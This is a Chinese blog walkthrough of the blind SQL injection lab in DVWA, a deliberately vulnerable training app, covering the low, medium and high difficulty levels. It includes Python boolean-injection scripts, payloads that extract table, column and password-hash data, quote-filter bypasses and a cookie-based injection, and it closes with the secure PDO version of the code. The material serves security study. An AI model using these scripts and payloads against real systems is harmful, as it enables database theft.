• sql盲注


    sql盲注

    low

    构造 1and 1=2 回显 User ID exists in the database.,说明是字符型注入

    构造 1' 回显 User ID is MISSING from the database.

    构造 1' -- + User ID exists in the database. ,说明执行语句 select * from [table_name]

    where id=''

    构造 1' and 1=2-- + 回显User ID is MISSING from the database.

    综上,查询正确时,回显 User ID exists in the database.

    查询为假或者语法错误时,回显 User ID is MISSING from the database.

    构造 1' and ascii(substr(database(),1,1))<128 -- + 回显正常

    直接上脚本,注意这里要加请求头,因为有cookie之类的

    import requests
    import sys
    
    url='http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/'
    
    headers={
    "Host":"127.0.0.1",
    
    "User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0",
    
    "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    
    "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
    
    "Accept-Encoding":"gzip, deflate",
    
    "Referer":"http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/",
    
    "Cookie":"security=low; PHPSESSID=j62fsi5l43enqvbis9rvgva7h8",
    
    "Connection":"close",
    
    "Upgrade-Insecure-Requests":"1"
    }
    #sql="1' and substr(database(),{0},1)='{1}'-- +" 爆数据库名
    #sql="1' and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1)='{1}'-- +"爆表名
    #sql="1' and substr((select group_concat(column_name)from information_schema.columns where table_name='users'),{0},1)='{1}' -- +"爆users中列名
    #sql="1' and substr((select group_concat(password) from users),{0},1)='{1}'-- +"爆users.password中具体内容
    sql="1' and substr((select group_concat(user) from users),{0},1)='{1}'-- +"爆users.user中具体内容
    
    flag='' 
    
    for i in range(1,250):
    
    	print('guess',str(i))
    
    	for ch in range(32,129):
    
    		if ch==128:
    
    			sys.exit(0)
    
    		sqli=sql.format(i,chr(ch))
    
    		params={"id":sqli,"Submit":"Submit"}
    
    		response=requests.get(url,params=params,headers=headers).text
    
    		if "User ID exists in the database" in response:
    
    			flag+=chr(ch)
    
    			print(flag)
    
    			break
    

    数据库:dvwa

    表名:guestbook,users

    users中列名:user,current_connections,total_connections,id,username,password,user_id,first_name,last_name,user,password,avatar,last_login,failed_login

    users.password中具体字段:

    81dc9bdb52d04dc20036dbd8313ed055,e99a18c428cb38d5f260853678922e03,8d3533d75ae2c3966d7e0d4fcc69216b,0d107d09f5bbe40cade3de5c71e9e9b7,5f4dcc3b5aa765d61d8327deb882cf99

    users.user中具体字段:

    admin,gordonb,1337,pablo,smithy

    注意脚本跑出来的是大写,实际上是小写

    medium

    抓包,发现是POST提交方式,直接改id的值

    构造id=1 and 1=2 回显User ID is MISSING from the database. 说明是数字型注入

    构造id=1 and ascii(substr(database(),1,1))<128 回显User ID exists in the database.

    构造1''''回显User ID is MISSING from the database.

    综上说明

    查询正确时回显User ID exists in the database.

    查询为假或者语法错误时回显User ID is MISSING from the database.

    import requests
    import sys
    
    url='http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/'
    
    headers={
    "Host": "127.0.0.1",
    
    "User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0",
    
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    
    "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
    
    "Accept-Encoding": "gzip, deflate",
    
    "Referer": "http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/",
    
    "Content-Type": "application/x-www-form-urlencoded",
    
    "Content-Length": "22",
    
    "Cookie": "security=medium; PHPSESSID=6m4uufmq1bchingfrnih933okc",
    
    "Connection": "close",
    
    "Upgrade-Insecure-Requests": "1"
    }
    #sql="1 and ascii(substr(database(),{0},1))={1}-- +" 
    
    #sql="1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1))={1}-- +"
    #sql="1 and ascii(substr((select group_concat(column_name)from information_schema.columns where table_name=0x7573657273),{0},1))={1} -- +"
    #sql="1 and ascii(substr((select group_concat(password) from users),{0},1))={1}-- +"
    sql="1 and ascii(substr((select group_concat(user) from users),{0},1))={1}-- +"
    
    flag='' 
    
    for i in range(1,250):
    
    	print('guess',str(i))
    
    	for ch in range(32,129):
    
    		if ch==128:
    
    			sys.exit(0)
    
    		sqli=sql.format(i,ch)
    
    		params={"id":sqli,"Submit":"Submit"}
    
    		response=requests.post(url,data=params,headers=headers).text
    
    		if "User ID exists in the database" in response:
    
    			flag+=chr(ch)
    
    			print(flag)
    
    			break
    

    这里跟Low脚本不同的是

    sql="1 and ascii(substr(database(),{0},1))={1}-- +"

    sql="1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1))={1}-- +"
    sql="1 and ascii(substr((select group_concat(column_name)from information_schema.columns where table_name=0x7573657273),{0},1))={1} -- +"
    sql="1 and ascii(substr((select group_concat(password) from users),{0},1))={1}-- +"
    sql="1 and ascii(substr((select group_concat(user) from users),{0},1))={1}-- +"

    可以看到查询语句中没有出现',如果用

    1 and substr(database(),{0},1)='{1}'-- +
    

    无论如何都爆不出数据库,这时怀疑是过滤了某些字符,测试得知是单引号,然后我们写成

    1 and ascii(substr(database(),{0},1))={1}-- +
    

    实现绕过,并且在后来的

    1 and ascii(substr((select group_concat(column_name)from information_schema.columns where table_name=0x7573657273),{0},1))={1} -- +
    

    用16进制绕过'users'的分号书写

    high

    进去页面,我们点击那个那个按钮,弹出一个窗口

    构造1 在原页面回显User ID exists in the database.

    构造 1 and 1=2 在原页面回显User ID exists in the database.

    构造 1' 原页面回显User ID is MISSING from the database.,并且此时返回时间有延迟

    构造1' -- +原页面回显User ID exists in the database.

    构造1' and 1=2 原页面回显User ID is MISSING from the database. 并且返回时间有延迟

    构造1' and ascii(substr(database(),1,1))<128 -- + 原页面回显User ID exists in the database.

    综上,我们猜测后台执行语句类似select * from [table_name] where id=''

    查询为真时,原回显User ID exists in the database.

    查询为假或者语法错误时,原页面回显User ID is MISSING from the database.

    我们猜测,在弹出的框中输入的值,是控制查询语句的where字句,以怎样的方式传递,我们抓包分析


    我们发现post区域id就是我们输入的值,然后再forward一下


    这时cookie里多了个id值,并且是我们Post区域内的,所以可以判定在弹出内的框框里输入的值会以cookie的形式赋值给原页面,然后通过这个cookie里的id值进行查询,我们只需改变cookie里的Id值即可实现sql注入

    源代码cookie-input.php

    <?php
    
    define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
    
    require_once DVWA_WEB_PAGE_TO_ROOT . 'dvwa/includes/dvwaPage.inc.php';
    
    dvwaPageStartup( array( 'authenticated', 'phpids' ) );
    
    $page = dvwaPageNewGrab();
    
    $page[ 'title' ] = 'Blind SQL Injection Cookie Input' . $page[ 'title_separator' ].$page[ 'title' ];
    
    if( isset( $_POST[ 'id' ] ) ) {
    
    	setcookie( 'id', $_POST[ 'id' ]);
    
    	$page[ 'body' ] .= "Cookie ID set!<br /><br /><br />";
    
    	$page[ 'body' ] .= "<script>window.opener.location.reload(true);</script>";
    
    }
    
    $page[ 'body' ] .= "
    
    <form action="#" method="POST">
    
    	<input type="text" size="15" name="id">
    
    	<input type="submit" name="Submit" value="Submit">
    
    </form>
    
    <hr />
    
    <br />
    
    
    
    <button onclick="self.close();">Close</button>";
    
    
    
    dvwaSourceHtmlEcho( $page );
    
    
    
    ?>
    
    
    
    
    

    可以看到将$_POST['id']设置成了一个cookie值取名为id

    代码high.php

    <?php
    
    if( isset( $_COOKIE[ 'id' ] ) ) {
    
    	// Get input
    
    	$id = $_COOKIE[ 'id' ];
    
    	// Check database
    
    	$getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    
    	$result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors
    
    	// Get results
    
    	$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    
    	if( $num > 0 ) {
    
    		// Feedback for end user
    
    		$html .= '<pre>User ID exists in the database.</pre>';
    
    	}
    
    	else {
    
    		// Might sleep a random amount
    
    		if( rand( 0, 5 ) == 3 ) {
    
    			sleep( rand( 2, 4 ) );
    
    		}
    
    		// User wasn't found, so the page wasn't!
    
    		header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
    
    		// Feedback for end user
    
    		$html .= '<pre>User ID is MISSING from the database.</pre>';
    
    	}
    
    	((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
    
    }
    
    ?>
    

    发现,将$_COOKIE['id']赋值给了$id,并执行查询语句,当我们查询为假或者语法错误时,会有一个sleep(2,4),这样从某种程度上就扰乱了时间盲注,只有当sleep(5)时,才会消除影响,但是这样时间要用很久,所以选择布尔盲注

    上脚本

    import requests
    import sys
    
    url='http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/'
    
    headers={
    "Host": "127.0.0.1",
    
    "User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0",
    
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    
    "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
    
    "Accept-Encoding": "gzip, deflate",
    
    "Referer": "http://127.0.0.1/dvwa/security.php",
    
    "Connection": "close",
    
    "Upgrade-Insecure-Requests": "1",
    
    "Pragma": "no-cache",
    
    "Cache-Control": "no-cache"
    }
    sql="1' and ascii(substr(database(),{0},1))={1}-- +" 
    
    #sql="1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1))={1}-- +"
    #sql="1' and ascii(substr((select group_concat(column_name)from information_schema.columns where table_name=0x7573657273),{0},1))={1} -- +"
    #sql="1' and ascii(substr((select group_concat(password) from users),{0},1))={1}-- +"
    #sql="1' and ascii(substr((select group_concat(user) from users),{0},1))={1}-- +"
    
    flag='' 
    
    for i in range(1,250):
    
    	print('guess',str(i))
    
    	for ch in range(32,129):
    
    		if ch==128:
    
    			sys.exit(0)
    
    		headers['Cookie']="id="+sql.format(i,ch)+"; security=high; PHPSESSID=6m4uufmq1bchingfrnih933okc"
    
    		response=requests.get(url,headers=headers).text
    
    		if "User ID exists in the database" in response:
    
    			flag+=chr(ch)
    
    			print(flag)
    
    			break
    

    impossible

    <?php
    
    if( isset( $_GET[ 'Submit' ] ) ) {
    
    	// Check Anti-CSRF token
    
    	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
    
    	// Get input
    
    	$id = $_GET[ 'id' ];
    
    	// Was a number entered?
    
    	if(is_numeric( $id )) {
    
    		// Check the database
    
    		$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
    
    		$data->bindParam( ':id', $id, PDO::PARAM_INT );
    
    		$data->execute();
    
    		// Get results
    
    		if( $data->rowCount() == 1 ) {
    
    			// Feedback for end user
    
    			$html .= '<pre>User ID exists in the database.</pre>';
    
    		}
    
    		else {
    
    			// User wasn't found, so the page wasn't!
    
    			header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
    
    
    
    			// Feedback for end user
    
    			$html .= '<pre>User ID is MISSING from the database.</pre>';
    
    		}
    
    	}
    
    }
    
    // Generate Anti-CSRF token
    
    generateSessionToken();
    
    ?>
    

    可以看到用了PDO技术,御防了sql注入

  • 相关阅读:
    网络基础
    模块和包的介绍与使用
    PHP 接口输出 图片
    Deprecated: Automatically populating $HTTP_RAW_POST_DATA is deprecated and will be removed in a future version. To avoid this warning set 'always_populate_raw_post_data' to '-1' in php.ini and use the
    dedeCMS 两个站共用同一个数据库 图片路径统一
    写入文件_调试方法
    Mysql触发器 使用示例
    部署GitLab遇到的问题记录
    防火墙对nginx服务器有影响
    更新yum源并重建缓存
  • 原文地址:https://www.cnblogs.com/NineOne/p/13764222.html
Copyright © 2020-2023  润新知